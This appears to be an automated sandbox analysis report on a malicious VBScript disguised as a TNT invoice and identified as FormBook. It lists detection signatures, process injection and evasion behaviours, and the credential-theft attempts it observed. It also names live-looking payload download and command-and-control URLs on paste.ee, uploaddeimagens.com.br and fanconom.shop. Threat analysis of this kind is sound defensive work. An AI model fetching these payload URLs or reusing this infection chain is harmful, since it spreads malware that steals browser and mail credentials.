Windows Analysis Report
TNT Invoicing_pdf.vbs

Overview

General Information

Sample name: TNT Invoicing_pdf.vbs
Analysis ID: 1427200
MD5: dc730ce99454b09b0cdb56ad864393a1
SHA1: 221a2f95154e2bce9723c5f19d6136984549f745
SHA256: 875354779fb810fdab20845476e3e312f030edf58dcc043b2ea8ac566d95fd9b
Tags: vbs
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses certutil -decode
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: uploaddeimagens.com.br Virustotal: Detection: 6% Perma Link
Source: http://uploaddeimagens.com.br Virustotal: Detection: 6% Perma Link
Source: https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500 Virustotal: Detection: 11% Perma Link
Source: https://uploaddeimagens.com.br Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for submitted file
Source: TNT Invoicing_pdf.vbs ReversingLabs: Detection: 13%
Source: TNT Invoicing_pdf.vbs Virustotal: Detection: 10% Perma Link
Yara detected FormBook
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: unknown HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.61.152.60:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2
Source: Binary string: SyncHost.pdbGCTL source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SYYSBomrTxWSggG.exe, 0000000C.00000000.2363857386.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3367182967.0000000000A9E000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, SyncHost.exe, 0000000D.00000003.2446320784.000000000442F000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2443807357.000000000427C000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.00000000045E0000.00000040.00001000.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2683740268.000000000477E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: SyncHost.pdb source: MSBuild.exe, 0000000A.00000002.2449590938.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, SYYSBomrTxWSggG.exe, 0000000C.00000002.3370688414.0000000000BB8000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 4x nop then pop edi 17_2_05669C46
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 4x nop then xor eax, eax 17_2_0566DE41
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe Code function: 4x nop then pop edi 17_2_05669006

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.6:49709 -> 216.40.34.41:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\wscript.exe Network Connect: 104.21.84.67 443 Jump to behavior
Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: paste.ee
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /images/004/766/979/original/new_image_vbs.jpg?1712588500 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/766/978/full/new_image_vbs.jpg?1712588469 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic HTTP traffic detected: GET /grace/gf.txt HTTP/1.1Host: fanconom.shopConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View IP Address: 172.67.215.45 172.67.215.45
Source: Joe Sandbox View IP Address: 216.40.34.41 216.40.34.41
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: TUCOWSCA TUCOWSCA
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /d/z0DWX HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/766/979/original/new_image_vbs.jpg?1712588500 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /images/004/766/978/full/new_image_vbs.jpg?1712588469 HTTP/1.1Host: uploaddeimagens.com.br
Source: global traffic HTTP traffic detected: GET /grace/gf.txt HTTP/1.1Host: fanconom.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /avr4/?-zd=Xr58V0PHlxJ&0Zut6f=x3E/o0JgLrsAY3mnIEvxKvoKIfHhyrIBWJwB0arEEJoLlbt8V3ExA9cg1sEiGVbm5mLCkgWBOmXsxt02WvVKyLItEbcRwm1+9Ok94pNpJk46kEUPTjVsVLh1d58gSyvREgIt0DM= HTTP/1.1Host: www.rhyme.academyAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: <li><a rel="nofollow" href="https://twitter.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.3 0.3) translate(-200 -300)"><path d="m 453.82593,412.80619 c -6.3097,2.79897 -13.09189,4.68982 -20.20852,5.54049 7.26413,-4.35454 12.84406,-11.24992 15.47067,-19.46675 -6.79934,4.03295 -14.3293,6.96055 -22.34461,8.53841 -6.41775,-6.83879 -15.56243,-11.111 -25.68298,-11.111 -19.43159,0 -35.18696,15.75365 -35.18696,35.18525 0,2.75781 0.31128,5.44359 0.91155,8.01875 -29.24344,-1.46723 -55.16995,-15.47582 -72.52461,-36.76396 -3.02879,5.19662 -4.76443,11.24048 -4.76443,17.6891 0,12.20777 6.21194,22.97747 15.65332,29.28716 -5.76773,-0.18265 -11.19331,-1.76565 -15.93716,-4.40083 -0.004,0.14663 -0.004,0.29412 -0.004,0.44248 0,17.04767 12.12889,31.26806 28.22555,34.50266 -2.95247,0.80436 -6.06101,1.23398 -9.26989,1.23398 -2.2673,0 -4.47114,-0.22124 -6.62011,-0.63114 4.47801,13.97857 17.47214,24.15143 32.86992,24.43441 -12.04227,9.43796 -27.21366,15.06335 -43.69965,15.06335 -2.84014,0 -5.64082,-0.16722 -8.39349,-0.49223 15.57186,9.98421 34.06703,15.8094 53.93768,15.8094 64.72024,0 100.11301,-53.61524 100.11301,-100.11387 0,-1.52554 -0.0343,-3.04251 -0.10204,-4.55261 6.87394,-4.95995 12.83891,-11.15646 17.55618,-18.21305 z" /></g></svg></a></li> equals www.twitter.com (Twitter)
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: <li><a rel="nofollow" href="https://www.facebook.com/hover"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100"><circle cx="50" cy="50" r="50" /><g transform="scale(0.25 0.25) translate(30 50)"><path d="M182.409,262.307v-99.803h33.499l5.016-38.895h-38.515V98.777c0-11.261,3.127-18.935,19.275-18.935 l20.596-0.009V45.045c-3.562-0.474-15.788-1.533-30.012-1.533c-29.695,0-50.025,18.126-50.025,51.413v28.684h-33.585v38.895h33.585 v99.803H182.409z" /></g></svg></a></li> equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: paste.ee
Source: powershell.exe, 00000009.00000002.2182091400.000001D05D83B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fanconom.shop
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2640957810.0000021D3D6E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055511000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000009.00000002.2182091400.000001D05BA0D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://uploaddeimagens.com.br
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.2640957810.0000021D3D66F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2640957810.0000021D3D6BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055511000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://analytics.paste.ee;
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com;
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000009.00000002.2182091400.000001D05D3A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fanconom.shop
Source: powershell.exe, 00000009.00000002.2182091400.000001D05D3A6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fanconom.shop/grace/gf.txt
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://help.hover.com/home?source=expired
Source: wscript.exe, 00000000.00000003.2094313834.00000213EEB31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069618451.00000213EEAFC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069657201.00000213ED057000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094492166.00000213ED02F000.00000004.00000020.00020000.00000000.sdmp, TNT Invoicing_pdf.vbs String found in binary or memory: https://lesferch.github.io/DesktopPic
Source: wscript.exe, 00000000.00000002.2097892682.00000213ED002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: SyncHost.exe, 0000000D.00000003.2624332335.0000000007648000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: SyncHost.exe, 0000000D.00000002.2682656755.0000000002789000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: powershell.exe, 00000009.00000002.2517338446.000001D06557D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000000.00000002.2097892682.00000213ED002000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/#
Source: wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/7
Source: wscript.exe, 00000000.00000003.2094492166.00000213ED09C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094891534.00000213ED09F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094225191.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2097512994.0000008E9C6F5000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097007069.00000213EF2F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088158638.00000213EEAEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098594812.00000213EF2F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097031089.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087091623.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF32F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097156576.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089710059.00000213EEB30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098135565.00000213ED0A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090655043.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/z0DWX
Source: wscript.exe, 00000000.00000003.2097007069.00000213EF2F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098594812.00000213EF2F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097031089.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090655043.00000213EF2F5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/z0DWXp
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://themes.googleusercontent.com
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://twitter.com/hover
Source: powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000009.00000002.2181470872.000001D053817000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469
Source: powershell.exe, 00000009.00000002.2181470872.000001D053817000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2182091400.000001D055733000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500
Source: SyncHost.exe, 0000000D.00000002.2687286234.0000000007668000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
